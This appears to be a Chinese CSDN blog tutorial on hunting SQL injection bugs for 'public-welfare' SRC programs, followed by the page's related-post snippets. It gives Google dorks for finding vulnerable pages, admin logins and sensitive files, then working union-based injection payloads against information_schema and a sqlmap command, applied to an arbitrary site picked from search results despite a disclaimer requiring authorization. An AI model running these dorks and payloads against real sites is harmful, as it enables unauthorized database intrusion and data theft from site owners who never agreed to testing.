超级干货!如何挖公益SRC实战/SQL注入

最新推荐文章于 2024-03-20 11:11:45 发布
最新推荐文章于 2024-03-20 11:11:45 发布
阅读量380 收藏 5
点赞数 1
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zkaqlaoniao/article/details/134422826
版权

目录

一、信息收集

二、实战演示

三、使用sqlmap进行验证

四、总结

一、信息收集

1.查找带有ID传参的网站(可以查找sql注入漏洞)
inurl:asp id=xx
2.查找网站后台(多数有登陆框,可以查找弱口令,暴力破解等漏洞)
site:http://xxxx.com “admin”
site:http://xx.com intext:管理
site:http://xx.com inurl:login
site:http://xx.com intitle:后台
3.查看上传漏洞
site:http://xx.com inurl:file
site:http://xx.com inurl:load
4.查找敏感文件
filetype:mdb|doc|xlsx|pdf

二、实战演示

1.谷歌语法搜索
inurl:php id=62
 

图片


随便点进一个带有id传参=62的网站,大概率存在SQL注入
 

图片


2.判断是否存在SQL注入漏洞,显示页面正常
id=62 and 1=1

图片


3.id=62 and 1=1显示页面不正常,已经肯定存在SQL注入
 

图片


4.查找列数
id=62 order by 10
发现列数是10
 

图片


5.查看回显点
id=111111 union select 1,2,3,4,5,6,7,8,9,10 from information_schema.tables where table_schema=database() limit 0,1-- qwe

图片

6.输出表名
id=111111 union select 1,2,3,4,5,6,table_name,8,9,10 from information_schema.tables where table_schema=database() limit 0,1-- qwe

图片

三、使用sqlmap进行验证

使用sqlmap命令查看库名
sqlmap.py -u url --dbs

图片

图片

四、总结

1.谷歌语法找到注入点
2.判断注入是否存在
3.查找列数
4.查找表名
5.使用sqlmap进行验证
第一次投稿,觉得这次实战记录很适合新手小白挖SRC,希望多多支持!

申明:本公众号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,

所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.

图片

没看够~?欢迎关注!

免费领取安全学习资料包!

渗透工具

技术文档、书籍

 

面试题

帮助你在面试中脱颖而出

视频

基础到进阶

环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等

 

应急响应笔记

渗透测试老鸟-九青
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
爱心捐助公益网站模板
06-24
爱心捐助公益网站模板里面包含7个子页面,适合公益类网站模板下载。
公益组织css模板下载
04-01
公益组织css模板下载 蓝色 企业 公司 服务 CSS HTML 模板下载
记一次实战公益src
m0_62100902的博客
07-05 1507
我认为公益src掘的话分两种,一种是你去找固定的漏洞,去用fofa或者Google语法去找可能有对应漏洞的url,然后去进一步测试,另一种就是正常的渗透测试,对一个公益网站进行完整的渗透测试,今天的实战先说第一种的src掘方法及漏洞如何提交。先丢一个 ’ 看回显,页面空白,继续丢 and 1=1 and 1=2 ,页面还是空白,然后在后面丢一个sleep(3) ,网页有延迟回显,说明这里存在一个时间盲注的sql注入漏洞,然后丢kali的sqlmap去跑。公司inurl:aspx?
SRC漏洞掘技巧(0基础入门到精通),只要收藏这一篇就够了!!
最新发布
logic1001的博客
03-20 1223
这里是由零信任安全实验室组建的一个知识平台,平台有批量验证的脚本、工具以及一些漏洞的POC,后续还会分享网络安全资源(漏洞掘文章 工具 资讯)以及SRC漏洞掘案例分享等等,资源多多,干货多多!请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者和本公众号无关。工具来自网络,安全性自测。
超详细的ssh(secure shell)服务介绍、搭建、配置、实战讲解 —— 超级干货
01-09
文章目录– 写在开头的话ssh的基本概念ssh的登录验证模式账户密码验证格式密钥对验证ssh(secure shell)的服务搭建Linux服务器的建立(VMware克隆形式)ssh(secure shell)服务的搭建安全防护的关闭Linux上用户名密码登录ssh服务器端查看是否安装openssh安装包Linux上用户名密码登录ssh服务器端Linux 主机之间的密钥对登录验证Windows使用密钥对登录Linuxssh(secure shell)服务的配置文件说明禁止使用密码登录禁止使用 root 远程登录修改默认端口、限制 ssh 监听 IP修改默认端口限制ssh监听IP:ssh服务相关
超级干货!如何从零开始成为内容运营.zip
12-21
超级干货!如何从零开始成为内容运营
如何简单公益SRC
2301_80115097的博客
11-20 539
我在上面的“提交报告”中,教大家提交的报告,漏洞标题、基本信息、漏洞正文,这3个都算好,不用管。制胜点就在这里了,比如你交了一个中危的漏洞是3分,但是你报告写的好,是优秀,积分翻倍变6分,相当于交了两个中危漏洞。我看很多人,漏洞正文只有文字 没有图片,很简陋,我们最好加上图片,审核员看的舒服一点,心情好点,对我们有好处。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。当初刚SRC,不会交报告,一股脑交了一大堆,全被打回来了,漏洞白 报告白写。
浅谈SQL注入漏洞原理及利用方式
Innocence_0的博客
07-19 235
数据在进行插入时,被过滤函数进行转义处理,导致恶意语句不能正常执行,但经过转义后的数据产生的 \ 不会被插入数据库中,在下一次进行需要进行数据查询的时候,直接从数据库中取出了存在恶意代码的数据,没有进行进一步的检验和处理,直接被调用拼接到语句当中,二次调用产生注入。先使用过滤函数对传入数据进行过滤,当数据传入数据库进行代码执行时,前后编码不一致,这时数据库采用了宽字节编码,由于编码的识别差异性这一特点,攻击者可以进行恶意构造,使其原本的闭合得以逃逸,从而可以被利用。)隔开,在语句中构造需要执行攻击的语句。
常见的网站漏洞——SQL注入
计算机硕士的博客
04-15 536
常见的网站漏洞——SQL注入
SQL注入漏洞介绍
m0_52108338的博客
09-06 492
SQL注入漏洞是一种常见的网络安全漏洞,是由于攻击者向数据库发送恶意SQL查询,从而访问、修改或删除数据库中的数据,甚至完全控制数据库服务器。
公益SRC实战|SQL注入漏洞攻略
2301_80127209的博客
11-15 81
1.谷歌语法找到注入点2.判断注入是否存在3.查找列数4.查找表名5.使用sqlmap进行验证第一次投稿,觉得这次实战记录很适合新手小白SRC,希望多多支持!申明:本公众号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.没看够~?欢迎关注!免费领取安全学习资料包!一起学习,共同进步t=N7T8免费领取安全学习资料包!
公益戒烟flash网站模板
04-09
公益戒烟flash网站模板
没内鬼,来点干货SQL优化和诊断
01-19
SQL优化与诊断 Explain诊断 Explain各参数的含义如下: 列名 说明 id 执行编号,标识select所属的行。如果在语句中没有子查询或关联查询,只有唯一的select,每行都将显示1.否则,内层的select语句一般会顺序编号,对应于其在原始语句中的位置 select_type 显示本行是简单或复杂select,如果查询有任何复杂的子查询,则最外层标记为PRIMARY(DERIVED、UNION、UNION RESUIT) table 访问引用哪个表(引用某个查询,如“derived3”) type 数据访问/读取操作类型(All、index、rang
最全干货SQL注入大合集
04-28
SQL注入大合集SQL注入大合集SQL注入大合集SQL注入大合集SQL注入大合集SQL注入大合集SQL注入大合集SQL注入大合集SQL注入大合集SQL注入大合集SQL注入大合集SQL注入大合集SQL注入大合集SQL注入大合集SQL注入大合集SQL注入大合集SQL注入大合集SQL注入大合集SQL注入大合集SQL注入大合集SQL注入大合集SQL注入大合集SQL注入大合集SQL注入大合集SQL注入大合集SQL注入大合集SQL注入大合集SQL注入大合集SQL注入大合集SQL注入大合集SQL注入大合集SQL注入大合集SQL注入大合集SQL注入大合集SQL注入大合集SQL注入大合集SQL注入大合集SQL注入大合集SQL注入大合集SQL注入大合集SQL注入大合集SQL注入大合集SQL注入大合集SQL注入大合集SQL注入大合集SQL注入大合集SQL注入大合集SQL注入大合集SQL注入大合集SQL注入大合集SQL注入大合集SQL注入大合集SQL注入大合集SQL注入大合集SQL注入大合集SQL注入大合集SQL注入大合集SQL注入大合集SQL注入大合集SQL注入大合集SQL注入大合集SQL注入大合集SQL
宠物公益bootstrap模板
04-02
宠物公益bootstrap模板
FineCMS公益版 v2.0.1
12-01
FineCMS公益版(简称版或公益版)是一款基于PHP+MySql+CI框架开发的高效简洁的中小型内容管理系统,面向多终端包括Pc端网页和移动端网页,支持自定义内容模型和会员模型,并且可
CSDN Share:大会PPT合集下载,纯干货
11-20
CSDN Share 是一款出色的Android阅读工具,阅读由 CSDN社区用户分享的技术文档。 通过CSDN Share可以在线阅读或离线下载CSDN 举办的各类技术活动的精彩讲义,以及来自CSDN下载社区由用户分享的技术文档。...
2023最新SRC漏洞掘快速上手攻略!
2301_77732591的博客
06-07 3493
随着网络安全的快速发展,黑客攻击的手段也越来越多样化,因此SRC漏洞掘作为一种新的网络安全技术,也在不断发展和完善。那么,作为一个网安小白如果想要入门SRC漏洞掘,需要掌握哪些知识呢?以下是本人通过多年从事网络安全工作的经验,综合网络上已有的资料,总结得出的指导SRC漏洞掘入门的详细介绍。1、BugcrowdBugcrowd是一个专门为企业提供漏洞检测、漏洞掘、漏洞修复、防御安全相关服务的平台,为各大知名企业提供安全检测服务。
教育src漏洞掘-2023-白帽必出教程
热门推荐
qq1140037586的博客
09-12 1万+
作为刚接触渗透的小伙伴儿肯定都想快速到漏洞提交平台获取注册码,或者想获取更多积分换取证书,这篇文章就是为了帮助各位师傅们快速上手取教育src
mysql 中文乱码_干货!彻底解决MySQL中文乱码
06-01
MySQL 中文乱码问题可以从以下几个方面入手解决: 1. 数据库编码设置:要确保数据库编码与表编码与数据编码都是一致的,一般建议使用 UTF-8 编码。可以通过以下命令进行设置: ``` ALTER DATABASE database_name CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci; ALTER TABLE table_name CONVERT TO CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci; ``` 2. 连接编码设置:在连接 MySQL 数据库时需要设置编码,确保客户端与服务器端使用相同的编码。可以在连接数据库时使用以下命令设置编码: ``` mysql -h hostname -u username -p --default-character-set=utf8mb4 database_name ``` 3. 配置文件设置:在 MySQL 配置文件中设置编码,确保 MySQL 服务器端使用正确的编码。可以在配置文件中添加以下配置: ``` [mysql] default-character-set=utf8mb4 [mysqld] character-set-server=utf8mb4 collation-server=utf8mb4_unicode_ci ``` 以上是解决 MySQL 中文乱码问题的一些基本方法,希望能对你有所帮助。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值